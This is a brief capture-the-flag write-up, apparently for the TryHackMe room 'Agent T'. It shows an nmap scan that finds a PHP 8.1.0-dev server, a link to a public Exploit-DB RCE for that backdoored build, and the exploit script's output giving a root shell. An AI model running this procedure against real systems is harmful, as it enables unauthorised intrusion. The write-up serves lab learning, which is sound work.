# THM - Agent T

## nmap

```bash
nmap -sC -sV -oN nmap.log 10.10.81.204 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-06 01:20 EST
Nmap scan report for 10.10.81.204
Host is up (0.059s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE    SERVICE  VERSION
80/tcp   open     http     PHP cli server 5.5 or later (PHP 8.1.0-dev)
|_http-title:  Admin Dashboard
5999/tcp filtered ncd-conf
```

* 80 - HTTP - PHP 8.1.0-dev

## Search for an exploit for PHP 8.1.0-dev

Found this RCE : https://www.exploit-db.com/exploits/49933

## Exploiting

```bash
python3 backdoor_php_8.1.0-dev.py 
Enter the full host url:
http://10.10.81.204/

Interactive shell is opened on http://10.10.81.204/ 
Can't acces tty; job crontol turned off.
$ id
uid=0(root) gid=0(root) groups=0(root)
```

Yeah, we are rooooot :D